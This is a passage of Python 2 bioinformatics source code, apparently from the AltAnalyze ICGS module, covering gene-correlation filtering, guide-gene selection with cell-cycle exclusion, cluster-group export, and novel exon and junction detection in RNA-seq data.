cellCycleRemove=cellCycleRemove1+cellCycleRemove2 ### It is possible for a cell cycle guide-gene to be reported in both guide1 and 2, but only as cell cycle associated in one of them
newDriverGenes3_filtered=[]
for i in newDriverGenes3:
if not i in cellCycleRemove:
newDriverGenes3_filtered.append(i)
newDriverGenes3_str = 'Guide3 '+string.join(newDriverGenes3_filtered,' ')+' amplify positive'
parameters.setGeneSelection(newDriverGenes3_str)
try:
parameters.setClusterGOElite('BioMarkers')
"""
if species == 'Mm' or species == 'Hs' or species == 'Rn':
parameters.setClusterGOElite('BioMarkers')
else:
parameters.setClusterGOElite('GeneOntology')
"""
except Exception, e:
print e
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, parameters, display=False, Normalize=True)
except Exception:
print traceback.format_exc()
try: copyICGSfiles(expFile,graphic_links)
except Exception: pass
return graphic_links,len(atleast_10)
def copyICGSfiles(expFile,graphic_links):
if 'ExpressionInput' in expFile:
root_dir = string.split(expFile,'ExpressionInput')[0]
else:
root_dir = string.split(expFile,'AltResults')[0]
destination_folder = root_dir+'/ICGS'
try: os.mkdir(destination_folder)
except Exception: pass
for (order,png) in graphic_links:
file = export.findFilename(png)
txt = string.replace(file,'.png','.txt')
pdf = string.replace(file,'.png','.pdf')
dest_png = destination_folder+'/'+file
dest_txt = destination_folder+'/'+txt
dest_pdf = destination_folder+'/'+pdf
shutil.copy(png, dest_png)
shutil.copy(png[:-4]+'.txt', dest_txt)
shutil.copy(png[:-4]+'.pdf', dest_pdf)
def pearsonCorrelations(ref_gene_exp,exp_value_db):
correlated=[]
for gene in exp_value_db:
rho,p = stats.pearsonr(ref_gene_exp,exp_value_db[gene])
if rho>rho_cutoff or rho<(rho_cutoff*-1):
if rho!= 1:
correlated.append(gene)
#print len(exp_value_db),len(correlated);sys.exit()
return correlated
def numpyCorrelationMatrix(x,rows,gene):
D1 = numpy.corrcoef(x)
gene_correlations={}
i=0
scores = []
for score_ls in D1:
for v in score_ls:
scores.append(v)
return numpy.average(scores)
def numpyCorrelationMatrixCount(x,rows,cutoff=0.4,geneTypeReport=None):
### Find which genes are most correlated
D1 = numpy.corrcoef(x)
gene_correlation_counts={}
i=0
for score_ls in D1:
correlated_genes=[]
geneID = rows[i]
k=0; genes_to_report=[]
for rho in score_ls:
if rho>cutoff:
correlated_genes.append(rows[k])
if rows[k] in geneTypeReport:
genes_to_report.append(rows[k])
k+=1
gene_correlation_counts[geneID]=len(correlated_genes),genes_to_report
i+=1
return gene_correlation_counts
def numpyCorrelationMatrixGene(x,rows,gene):
D1 = numpy.corrcoef(x)
gene_correlations={}
i=0
for score_ls in D1:
scores = []
geneID = rows[i]
k=0
for v in score_ls:
scores.append((v,rows[k]))
k+=1
scores.sort()
gene_correlations[geneID] = scores
i+=1
correlated_genes={}
rho_values = map(lambda (r,g): r,gene_correlations[gene])
genes = map(lambda (r,g): g,gene_correlations[gene])
s1 = bisect.bisect_right(rho_values,rho_cutoff)
s2 = bisect.bisect_left(rho_values,-1*rho_cutoff)
correlated = genes[:s2] ### for the right bisect, remove self correlations with -1
correlated = genes[s1:] ### for the left bisect, remove self correlations with -1
#print len(rows), len(correlated);sys.exit()
return len(correlated)/len(rows)
def numpyCorrelationMatrixGeneAlt(x,rows,genes,gene_to_symbol,rho_cutoff):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=RuntimeWarning) ### hides import warnings
D1 = numpy.ma.corrcoef(x)
i=0
gene_correlations={}
for score_ls in D1:
scores = []
try: symbol = gene_to_symbol[rows[i]][0]
except Exception: symbol = '$'
if rows[i] in genes or symbol in genes:
k=0
for v in score_ls:
if str(v)!='nan':
if v > rho_cutoff:
uid = rows[k]
if uid in gene_to_symbol: uid = gene_to_symbol[uid][0]
scores.append((v,uid))
k+=1
scores.sort()
scores.reverse()
scores = map(lambda x: x[1], scores[:140]) ### grab the top 140 correlated gene symbols only
if len(symbol)==1: symbol = rows[i]
gene_correlations[symbol] = scores
i+=1
return gene_correlations
def genericRowIDImport(filename):
id_list=[]
for line in open(filename,'rU').xreadlines():
uid = string.split(line,'\t')[0]
if ' ' in uid:
for id in string.split(uid,' '):
id_list.append(id)
else:
id_list.append(uid)
return id_list
def writeFilteredFileReimport(expFile,platform,headers,expressed_values):
filtered_file=expFile[:-4]+'-VarGenes.txt'
groups_file = string.replace(expFile,'exp.','groups.')
filtered_groups = string.replace(filtered_file,'exp.','groups.')
try: shutil.copy(groups_file,filtered_groups)
except: pass
eo = export.ExportFile(filtered_file)
eo.write(headers)
for line in open(expFile,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
uid = t[0]
if uid in expressed_values:
if platform=='RNASeq': ### set to RNASeq when non-log2 data detected
values = t[1:]
try: values = map(lambda x: math.log(float(x)+1,2),values)
except Exception:
if 'NA' in values:
values = [0 if x=='NA' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
elif '' in values:
values = [0 if x=='' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
values = map(str,values)
eo.write(string.join([uid]+values,'\t')+'\n')
else:
eo.write(line)
eo.close()
return filtered_file
def writeFilteredFile(results_file,platform,headers,gene_to_symbol_db,expressed_values,atleast_10,excludeGenes=[]):
eo = export.ExportFile(results_file)
try: headers = string.replace(headers,'row_clusters-flat','UID')
except Exception:
headers = string.join(headers,'\t')+'\n'
headers = string.replace(headers,'row_clusters-flat','UID')
eo.write(headers)
keep=[]; sort_genes=False
e=0
if len(atleast_10)==0:
atleast_10 = expressed_values
sort_genes = True
for i in atleast_10:
if i in gene_to_symbol_db:
symbol = gene_to_symbol_db[i][0]
else: symbol = i
if i not in excludeGenes and symbol not in excludeGenes:
if i not in keep:
keep.append((symbol,i))
if sort_genes:
keep.sort(); keep.reverse()
for (symbol,i) in keep:
"""
if platform == 'RNASeq':
values = map(lambda x: logTransform(x), expressed_values[i])
else:
"""
values = map(str,expressed_values[i])
eo.write(string.join([symbol]+values,'\t')+'\n')
e+=1
eo.close()
def remoteGetDriverGenes(Species,platform,results_file,numSamplesClustered=3,excludeCellCycle=False,ColumnMethod='hopach'):
global species
species = Species
guideGenes, cellCycleRemove = correlateClusteredGenes(platform,results_file,stringency='strict',excludeCellCycle=excludeCellCycle,ColumnMethod=ColumnMethod)
guideGenes = string.join(guideGenes.keys(),' ')+' amplify positive'
return guideGenes
def correlateClusteredGenes(platform,results_file,stringency='medium',numSamplesClustered=3,
excludeCellCycle=False,graphics=[],ColumnMethod='hopach',rhoCutOff=0.2, transpose=False,
includeMoreCells=False):
if numSamplesClustered<1: numSamplesClustered=1
### Get all highly variably but low complexity differences, typically one or two samples that are really different
if stringency == 'medium':
new_results_file = string.replace(results_file,'.txt','-filtered.txt')
new_results_file = string.replace(new_results_file,'.cdt','-filtered.txt')
eo = export.ExportFile(new_results_file)
medVarHighComplexity=[]; medVarLowComplexity=[]; highVarHighComplexity=[]; highVarLowComplexity=[]
if transpose==False or includeMoreCells:
medVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=3,hits_to_report=6,transpose=transpose)
medVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.1,hits_cutoff=3,hits_to_report=6,transpose=transpose) #hits_cutoff=6
highVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.5,hits_cutoff=1,hits_to_report=4,transpose=transpose)
highVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.2,hits_cutoff=1,hits_to_report=6,filter=True,numSamplesClustered=numSamplesClustered,transpose=transpose)
else:
highVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.5,hits_cutoff=1,hits_to_report=4,transpose=transpose)
#combined_results = dict(medVarLowComplexity.items() + medVarLowComplexity.items() + highVarLowComplexity.items() + highVarHighComplexity.items())
combined_results={}
for i in medVarLowComplexity: combined_results[i]=[]
for i in medVarHighComplexity: combined_results[i]=[]
for i in highVarLowComplexity: combined_results[i]=[]
for i in highVarHighComplexity: combined_results[i]=[]
#combined_results = highVarHighComplexity
if stringency == 'strict':
medVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=4,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered)
medVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.1,hits_cutoff=4,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered) #hits_cutoff=6
highVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.5,hits_cutoff=3,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered)
highVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=3,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered)
#combined_results = dict(medVarLowComplexity.items() + medVarLowComplexity.items() + highVarLowComplexity.items() + highVarHighComplexity.items())
combined_results={}
for i in medVarLowComplexity: combined_results[i]=[]
for i in medVarHighComplexity: combined_results[i]=[]
for i in highVarLowComplexity: combined_results[i]=[]
for i in highVarHighComplexity: combined_results[i]=[]
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=rhoCutOff,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle)
if guideGenes == 'TooFewBlocks':
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=rhoCutOff+0.1,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle)
if guideGenes == 'TooFewBlocks':
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=rhoCutOff+0.2,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle,forceOutput=True)
if len(guideGenes)>200:
print 'Too many guides selected (>200)... performing more stringent filtering...'
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=0.1,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle,restrictTFs=True)
return guideGenes, addition_cell_cycle_associated
#B4galt6, Prom1
for tuple_ls in combined_results:
data_length = len(tuple_ls);break
if data_length == len(column_header):
eo.write(string.join(column_header,'\t')+'\n')
else:
eo.write(string.join(['UID']+column_header,'\t')+'\n')
#combined_results = highVarHighComplexity
for tuple_ls in combined_results:
eo.write(string.join(list(tuple_ls),'\t')+'\n')
eo.close()
cluster = True
if cluster == True and transpose==False:
from visualization_scripts import clustering
if ColumnMethod == 'hopach':
row_method = 'hopach'
column_method = 'hopach'
else:
column_method = ColumnMethod
row_method = 'average'
row_metric = 'correlation'
column_metric = 'cosine'
color_gradient = 'yellow_black_blue'
if platform == 'exons': color_gradient = 'yellow_black_blue'
transpose = False
try:
len(guide_genes)
except Exception:
guide_genes = []
graphics = clustering.runHCexplicit(new_results_file, graphics, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
cluster_file = string.replace(graphics[0][1],'.png','.txt')
#exportGroupsFromClusters(cluster_file,expFile,platform)
return graphics, new_results_file
def exportReDefinedClusterBlocks(results_file,block_db,rho_cutoff):
### Re-import the matrix to get the column cluster IDs
matrix, column_header, row_header, dataset_name, group_db, priorColumnClusters, priorRowClusters = clustering.remoteImportData(results_file)
new_block_db = {}
centroid_blocks=[]
centroids = []
for block in block_db:
if len(block_db[block])>3:
new_block_db[block] = block_db[block] ### Keep track of the row_header indexes associated with each blcok
data = map(lambda x: matrix[x],block_db[block])
### Compute an expression centroid from the block (cluster)
centroid = [float(sum(col))/len(col) for col in zip(*data)]
centroids.append(centroid)
centroid_blocks.append(block)
### Compare block centroids
D1 = numpy.corrcoef(centroids)
i=0
correlated_blocks=[]
for score_ls in D1:
scores = []
block = centroid_blocks[i]
k=0
for v in score_ls:
if str(v)!='nan' and v>0.6:
if block !=centroid_blocks[k]:
blocks = [block,centroid_blocks[k]]
blocks.sort()
if blocks not in correlated_blocks:
correlated_blocks.append(blocks)
k+=1
i+=1
newBlock=0
existing=[]
updated_blocks={}
correlated_blocks.sort()
print correlated_blocks
### Build a tree of related blocks (based on the code in junctionGraph)
for (block1,block2) in correlated_blocks:
if block1 not in existing and block2 not in existing:
newBlock=newBlock+1
updated_blocks[newBlock]=[block1,]
updated_blocks[newBlock].append(block2)
existing.append(block1)
existing.append(block2)
elif block1 in existing and block2 not in existing:
for i in updated_blocks:
if block1 in updated_blocks[i]:
updated_blocks[i].append(block2)
existing.append(block2)
elif block2 in existing and block1 not in existing:
for i in updated_blocks:
if block2 in updated_blocks[i]:
updated_blocks[i].append(block1)
existing.append(block1)
elif block1 in existing and block2 in existing:
for i in updated_blocks:
if block1 in updated_blocks[i]:
b1=i
if block2 in updated_blocks[i]:
b2=i
if b1!=b2:
for b in updated_blocks[b2]:
if b not in updated_blocks[b1]:
updated_blocks[b1].append(b)
del updated_blocks[b2]
### Add blocks not correlated to other blocks (not in correlated_blocks)
#print len(existing),len(centroid_blocks)
print updated_blocks
for block in centroid_blocks:
if block not in existing:
newBlock+=1
updated_blocks[newBlock]=[block]
import collections
row_order = collections.OrderedDict()
for newBlock in updated_blocks:
events_in_block=0
for block in updated_blocks[newBlock]:
for i in new_block_db[block]:
events_in_block+=1
if events_in_block>5:
for block in updated_blocks[newBlock]:
for i in new_block_db[block]:
row_order[i] = newBlock ### i is a row_header index - row_header[i] is a UID
#if newBlock==3:
#if row_header[i]=='TAF2&ENSG00000064313&E9.1-I9.1_120807184__ENSG00000064313&E9.1-E10.1':
#print row_header[i]
print updated_blocks
### Non-clustered block results - Typically not used by good to refer back to when testing
original_block_order = collections.OrderedDict()
for block in new_block_db:
for i in new_block_db[block]:
original_block_order[i]=block
#row_order = original_block_order
### Export the results
row_header.reverse() ### Reverse order is the default
priorColumnClusters = map(str,priorColumnClusters)
new_results_file = results_file[:-4]+'-BlockIDs.txt'
eo = export.ExportFile(new_results_file)
eo.write(string.join(['UID','row_clusters-flat']+column_header,'\t')+'\n')
eo.write(string.join(['column_clusters-flat','']+priorColumnClusters,'\t')+'\n')
for i in row_order:
cluster_number = str(row_order[i])
uid = row_header[i]
values = map(str,matrix[i])
eo.write(string.join([uid,cluster_number]+values,'\t')+'\n')
eo.close()
print 'Filtered, grouped expression clusters exported to:',new_results_file
def correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=4,hits_to_report=5,
filter=False,geneFilter=None,numSamplesClustered=3,excludeCellCycle=False,restrictTFs=False,
forceOutput=False,ReDefinedClusterBlocks=False,transpose=False):
from visualization_scripts import clustering
addition_cell_cycle_associated=[]
if geneFilter != None:
geneFilter_db={}
for i in geneFilter:
geneFilter_db[i[0]]=[]
geneFilter=geneFilter_db
matrix, column_header, row_header, dataset_name, group_db = clustering.importData(results_file,geneFilter=geneFilter)
if transpose: ### If performing reduce cluster heterogeneity on cells rather than on genes
#print 'Transposing matrix'
matrix = map(numpy.array, zip(*matrix)) ### coverts these to tuples
column_header, row_header = row_header, column_header
Platform = None
ADTs=[]
for i in row_header:
if 'ENS' in i and '-' in i and ':' in i: Platform = 'exons'
else:
ADT_status = check_for_ADT(i)
if ADT_status: ADTs.append(i)
print ADTs
#print hits_to_report
if hits_to_report == 1:
### Select the best gene using correlation counts and TFs
try:
from import_scripts import OBO_import; import ExpressionBuilder
gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
symbol_to_gene = OBO_import.swapKeyValues(gene_to_symbol_db)
try: TFs = importGeneSets('Biotypes',filterType='transcription regulator',geneAnnotations=gene_to_symbol_db)
except Exception: TFs = importGeneSets('BioTypes',filterType='transcription regulator',geneAnnotations=gene_to_symbol_db)
if excludeCellCycle == True or excludeCellCycle == 'strict':
try: cell_cycle = importGeneSets('KEGG',filterType='Cell cycle:',geneAnnotations=gene_to_symbol_db)
except Exception:
cell_cycle = {}
try: cell_cycle_go = importGeneSets('GeneOntology',filterType='GO:0022402',geneAnnotations=gene_to_symbol_db)
except Exception: cell_cycle_go={}
for i in cell_cycle_go:
cell_cycle[i]=[]
print len(cell_cycle),'cell cycle genes being considered.'
else:
cell_cycle={}
except Exception:
print traceback.format_exc()
symbol_to_gene={}; TFs={}; cell_cycle={}
gene_corr_counts = numpyCorrelationMatrixCount(matrix,row_header,cutoff=0.4,geneTypeReport=TFs)
#try: column_header = map(lambda x: string.split(x,':')[1],column_header[1:])
#except Exception: column_header = column_header[1:]
i=0
block=0
if ReDefinedClusterBlocks:
import collections
block_db=collections.OrderedDict() ### seems benign but could alter legacy results
else:
block_db={}
for row in matrix:
if i!=0:
rho,p = stats.pearsonr(row,matrix[i-1]) ### correlate to the last ordered row
#if row_header[i] == 'Pax6': print [block],row_header[i-1],rho,rho_cutoff
"""
try:
if row_header[i] in guide_genes: print row_header[i], rho
if row_header[i-1] in guide_genes: print row_header[i-1], rho
if row_header[i+1] in guide_genes: print row_header[i+1], rho
except Exception:
pass
"""
#if hits_to_report == 1: print [block],row_header[i], row_header[i-1],rho,rho_cutoff
#print rho
if rho>0.95:
pass ### don't store this
elif rho>rho_cutoff:
try:
block_db[block].append(i) ### store the row index
except Exception:
block_db[block] = [i] ### store the row index
else:
block+=1
block_db[block] = [i] ### store the row index
else:
block_db[block] = [i] ### store the row index
i+=1
if ReDefinedClusterBlocks:
### Produces a filtered-down and centroid organized heatmap text file
exportReDefinedClusterBlocks(results_file,block_db,rho_cutoff)
if hits_to_report == 1:
if len(block_db)<4 and forceOutput==False:
return 'TooFewBlocks', None
guideGenes={}
### Select the top TFs or non-TFs with the most gene correlations
for b in block_db:
corr_counts_gene = []; cell_cycle_count=[]
#print len(block_db), b, map(lambda i: row_header[i],block_db[b])
for (gene,i) in map(lambda i: (row_header[i],i),block_db[b]):
corr_counts_gene.append((len(gene_corr_counts[gene][1]),gene_corr_counts[gene][0],gene))
if gene in cell_cycle:
cell_cycle_count.append(gene)
corr_counts_gene.sort(); tfs=[]
#print b, corr_counts_gene, '***',len(cell_cycle_count)
if (len(cell_cycle_count)>1) or (len(corr_counts_gene)<4 and (len(cell_cycle_count)>0)): pass
else:
tf_count=0
for (r,t, gene) in corr_counts_gene:
if gene in TFs:
if gene not in cell_cycle:
if restrictTFs==True and tf_count==0: pass
else:
guideGenes[gene]=[]
tf_count+=1
if len(tfs)==0:
gene = corr_counts_gene[-1][-1]
if gene in cell_cycle and LegacyMode: pass
else:
guideGenes[gene]=[]
#block_db[b]= [corr_counts_gene[-1][-1]] ### save just the selected gene indexes
### Additional filter to remove guides that will bring in cell cycle genes (the more guides the more likely)
if excludeCellCycle == 'strict':
#print 'guides',len(guideGenes)
guideCorrelated = numpyCorrelationMatrixGeneAlt(matrix,row_header,guideGenes,gene_to_symbol_db,rho_cutoff)
guideGenes={}
for gene in guideCorrelated:
cell_cycle_count=[]
for corr_gene in guideCorrelated[gene]:
if corr_gene in cell_cycle: cell_cycle_count.append(corr_gene)
#print gene, len(cell_cycle_count),len(guideCorrelated[gene])
if (float(len(cell_cycle_count))/len(guideCorrelated[gene]))>.15 or (len(guideCorrelated[gene])<4 and (len(cell_cycle_count)>0)):
print gene, cell_cycle_count
addition_cell_cycle_associated.append(gene)
pass
else:
guideGenes[gene]=[]
print 'additional Cell Cycle guide genes removed:',addition_cell_cycle_associated
for ADT in ADTs: guideGenes[ADT]=[]
print len(guideGenes), 'novel guide genes discovered:', guideGenes.keys()
return guideGenes,addition_cell_cycle_associated
def greaterThan(x,results_file,numSamplesClustered):
if 'alt_junctions' not in results_file and Platform == None:
if x>(numSamplesClustered-1): return 1
else: return 0
else:
return 1
max_block_size=0
### Sometimes the hits_cutoff is too stringent so take the largest size instead
for block in block_db:
indexes = len(block_db[block])
if indexes>max_block_size: max_block_size=indexes
max_block_size-=1
retained_ids={}; final_rows = {}
for block in block_db:
indexes = block_db[block]
#print [block], len(indexes),hits_cutoff,max_block_size
if len(indexes)>hits_cutoff or len(indexes)>max_block_size: ###Increasing this helps get rid of homogenous clusters of little significance
#if statistics.avg(matrix[indexes[0]][1:]) < -2: print statistics.avg(matrix[indexes[0]][1:]), len(indexes)
gene_names = map(lambda i: row_header[i], indexes)
#if 'Pax6' in gene_names or 'WNT8A' in gene_names: print '******',hits_to_report, gene_names
indexes = indexes[:hits_to_report]
if filter:
new_indexes = []
for index in indexes:
vs = list(matrix[index])
a = map(lambda x: greaterThan(x,results_file,numSamplesClustered),vs)
b=[1]*numSamplesClustered
c = [(i, i+len(b)) for i in range(len(a)) if a[i:i+len(b)] == b]
if len(c)>0: #http://stackoverflow.com/questions/10459493/find-indexes-of-sequence-in-list-in-python
new_indexes.append(index)
"""
vs.sort()
try:
if abs(vs[-5]-vs[5])>6: new_indexes.append(index)
except Exception:
if abs(vs[-1]-vs[1])>6: new_indexes.append(index)"""
indexes = new_indexes
#if block == 1: print map(lambda i:row_header[i],indexes)
#print indexes;sys.exit()
for ls in map(lambda i: [row_header[i]]+map(str,(matrix[i])), indexes):
final_rows[tuple(ls)]=[]
for i in indexes:
retained_ids[row_header[i]]=[]
added_genes=[]
if len(final_rows)==0:
for block in block_db:
indexes = block_db[block]
if len(indexes)>hits_cutoff or len(indexes)>max_block_size:
indexes = indexes[:hits_to_report]
for ls in map(lambda i: [row_header[i]]+map(str,(matrix[i])), indexes):
final_rows[tuple(ls)]=[]
added_genes.append(ls[0])
if len(final_rows)==0:
for block in block_db:
indexes = block_db[block]
for ls in map(lambda i: [row_header[i]]+map(str,(matrix[i])), indexes):
final_rows[tuple(ls)]=[]
added_genes.append(ls[0])
if len(ADTs)>0:
for ADT in ADTs:
if ADT not in added_genes:
ls = [ADT]+matrix[row_header.index(ADT)]
final_rows[tuple(ls)]=[]
#print 'block length:',len(block_db), 'genes retained:',len(retained_ids)
return final_rows, column_header
def exportGroupsFromClusters(cluster_file,expFile,platform,suffix=None):
lineNum=1
for line in open(cluster_file,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if lineNum==1: names = t[2:]; lineNum+=1
elif lineNum==2: clusters = t[2:]; lineNum+=1
else: break
unique_clusters=[] ### Export groups
new_groups_dir = string.replace(expFile,'exp.','groups.')
new_comps_dir = string.replace(expFile,'exp.','comps.')
if suffix != None:
new_groups_dir = new_groups_dir[:-4]+'-'+suffix+'.txt' ###Usually end in ICGS
new_comps_dir = new_comps_dir[:-4]+'-'+suffix+'.txt'
out_obj = export.ExportFile(new_groups_dir)
cluster_number=0
cluster_db={}
for name in names:
cluster = clusters[names.index(name)]
if platform == 'RNASeq':
if 'junction_quantification' not in name and '.bed' not in name:
name = name+'.bed'
elif 'junction_quantification.txt' not in name and '.txt' not in name and '.bed' not in name:
name = name+'.txt'
if ':' in name:
group,name = string.split(name,':')
if group in cluster_db:
clust_num=cluster_db[group]
else:
cluster_number+=1
cluster_db[group] = cluster_number
clust_num = cluster_number
if cluster=='NA': cluster = group
else:
clust_num = cluster
out_obj.write(name+'\t'+str(clust_num)+'\t'+cluster+'\n')
clust_num = str(clust_num)
if clust_num not in unique_clusters: unique_clusters.append(clust_num)
out_obj.close()
comps=[] #Export comps
out_obj = export.ExportFile(new_comps_dir)
""" ### All possible pairwise group comparisons
for c1 in unique_clusters:
for c2 in unique_clusters:
temp=[int(c2),int(c1)]; temp.sort(); temp.reverse()
if c1 != c2 and temp not in comps:
out_obj.write(str(temp[0])+'\t'+str(temp[1])+'\n')
comps.append(temp)
"""
### Simple method comparing each subsequent ordered cluster (HOPACH orders based on relative similarity)
last_cluster = None
for c1 in unique_clusters:
if last_cluster !=None:
out_obj.write(c1+'\t'+last_cluster+'\n')
last_cluster=c1
out_obj.close()
return new_groups_dir
def logTransform(value):
try: v = math.log(value,2)
except Exception: v = math.log(0.001,2)
return str(v)
class MultiCorrelatePatterns():
def __init__(self,expressed_values):
self.expressed_values = expressed_values
def __call__(self,features_to_correlate):
from scipy import stats
correlated_genes={}
for uid in features_to_correlate:
ref_values = self.expressed_values[uid]
for uid2 in self.expressed_values:
values = self.expressed_values[uid2]
rho,p = stats.pearsonr(values,ref_values)
if rho>rho_cutoff or rho<-1*rho_cutoff:
if uid!=uid2 and rho != 1.0:
try: correlated_genes[uid].append(uid2)
except Exception: correlated_genes[uid] = [uid]
return correlated_genes
def parseCountFile(fn,parseFeature,search_exon_db):
novel_exon_db={}; firstLine=True
unique_genes={}
for line in open(fn,'rU').xreadlines():
key = string.split(line,'\t')[0]
#t = string.split(line,'\t')
if firstLine: firstLine = False
else:
#uid, coordinates = string.split(key,'=')
#values = map(lambda x: float(x), t[1:])
#gene = string.split(uid,':')[0]
#if max(values)>5: unique_genes[gene] = []
if '_' in key: ### Only look at novel exons
#ENSG00000112695:I2.1_75953139=chr6:75953139-75953254
uid, coordinates = string.split(key,'=')
gene = string.split(uid,':')[0]
if parseFeature == 'exons':
if '-' not in uid:
chr,coordinates = string.split(coordinates,':') ### Exclude the chromosome
coord1,coord2 = string.split(coordinates,'-')
intron = string.split(uid,'_')[0]
intron = string.split(intron,':')[1]
first = intron+'_'+coord1
second = intron+'_'+coord2
proceed = True
if first in uid: search_uid = second ### if the first ID is already the one looked for, store the second with the exon ID
elif second in uid: search_uid = first
else:
proceed = False
#print uid, first, second; sys.exit()
#example: ENSG00000160785:E2.15_156170151;E2.16_156170178=chr1:156170151-156170178
if proceed:
try: novel_exon_db[gene].append((uid,search_uid))
except Exception: novel_exon_db[gene] = [(uid,search_uid)]
elif '-' in uid and 'I' in uid: ### get junctions
if gene in search_exon_db:
for (u,search_uid) in search_exon_db[gene]:
#if gene == 'ENSG00000137076': print u,search_uid,uid
if search_uid in uid:
novel_exon_db[uid] = u ### Relate the currently examined novel exon ID to the junction not current associated
#if gene == 'ENSG00000137076': print u, uid
#print uid;sys.exit()
#print len(unique_genes); sys.exit()
return novel_exon_db
def getJunctionType(species,fn):
root_dir = string.split(fn,'ExpressionInput')[0]
fn = filepath(root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt')
firstLine=True
junction_type_db={}; type_db={}
for line in open(fn,'rU').xreadlines():
t = string.split(line,'\t')
if firstLine: firstLine = False
else:
id=t[0]; junction_type = t[8]
if '-' in id:
if 'trans-splicing' in line:
junction_type = 'trans-splicing'
junction_type_db[id] = junction_type
try: type_db[junction_type]+=1
except Exception: type_db[junction_type]=1
print 'Breakdown of event types'
for type in type_db:
print type, type_db[type]
return junction_type_db
def maxCount(ls):
c=0
for i in ls:
if i>0.5: c+=1
return c
def getHighExpNovelExons(species,fn):
""" Idea - if the ranking of exons based on expression changes from one condition to another, alternative splicing is occuring """
junction_type_db = getJunctionType(species,fn)
### Possible issue detected with novel exon reads: ['ENSG00000121577'] ['119364543'] cardiac
exon_max_exp_db={}; uid_key_db={}; firstLine=True
novel_intronic_junctions = {}
novel_intronic_exons = {}
cutoff = 0.2
read_threshold = 0.5
expressed_junction_types={}
features_to_export={}
exon_coord_db={}
for line in open(fn,'rU').xreadlines():
t = string.split(line,'\t')
if firstLine: firstLine = False
else:
key=t[0]
#ENSG00000112695:I2.1_75953139=chr6:75953139-75953254
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
gene = string.split(uid,':')[0]
values = map(lambda x: float(x), t[1:])
max_read_counts = max(values)
try: exon_max_exp_db[gene].append((max_read_counts,uid))
except Exception: exon_max_exp_db[gene] = [(max_read_counts,uid)]
uid_key_db[uid] = key ### retain the coordinate info
if '-' in uid and (':E' in uid or '-E' in uid):
junction_type = junction_type_db[uid]
if max_read_counts>read_threshold:
samples_expressed = maxCount(values)
if samples_expressed>2:
try: expressed_junction_types[junction_type]+=1
except Exception: expressed_junction_types[junction_type]=1
if junction_type == 'trans-splicing' and'_' not in uid:
try: expressed_junction_types['known transplicing']+=1
except Exception: expressed_junction_types['known transplicing']=1
elif junction_type == 'novel' and '_' not in uid:
try: expressed_junction_types['novel but known sites']+=1
except Exception: expressed_junction_types['novel but known sites']=1
elif junction_type == 'novel' and 'I' not in uid:
try: expressed_junction_types['novel but within 50nt of a known sites']+=1
except Exception: expressed_junction_types['novel but within 50nt of a known sites']=1
elif 'I' in uid and '_' in uid and junction_type!='trans-splicing':
#print uid;sys.exit()
try: expressed_junction_types['novel intronic junctions']+=1
except Exception: expressed_junction_types['novel intronic junctions']=1
coord = string.split(uid,'_')[-1]
if '-' in coord:
coord = string.split(coord,'-')[0]
try: novel_intronic_junctions[gene]=[coord]
except Exception: novel_intronic_junctions[gene].append(coord)
elif ('I' in uid or 'U' in uid) and '_' in uid and max_read_counts>read_threshold:
if '-' not in uid:
samples_expressed = maxCount(values)
if samples_expressed>2:
try: expressed_junction_types['novel intronic exon']+=1
except Exception: expressed_junction_types['novel intronic exon']=1
coord = string.split(uid,'_')[-1]
#print uid, coord;sys.exit()
#if 'ENSG00000269897' in uid: print [gene,coord]
try: novel_intronic_exons[gene].append(coord)
except Exception: novel_intronic_exons[gene]=[coord]
exon_coord_db[gene,coord]=uid
print 'Expressed (count>%s for at least 3 samples) junctions' % read_threshold
for junction_type in expressed_junction_types:
print junction_type, expressed_junction_types[junction_type]
expressed_junction_types={}
#print len(novel_intronic_junctions)
#print len(novel_intronic_exons)
for gene in novel_intronic_junctions:
if gene in novel_intronic_exons:
for coord in novel_intronic_junctions[gene]:
if coord in novel_intronic_exons[gene]:
try: expressed_junction_types['confirmed novel intronic exons']+=1
except Exception: expressed_junction_types['confirmed novel intronic exons']=1
uid = exon_coord_db[gene,coord]
features_to_export[uid]=[]
#else: print [gene], novel_intronic_junctions[gene]; sys.exit()
for junction_type in expressed_junction_types:
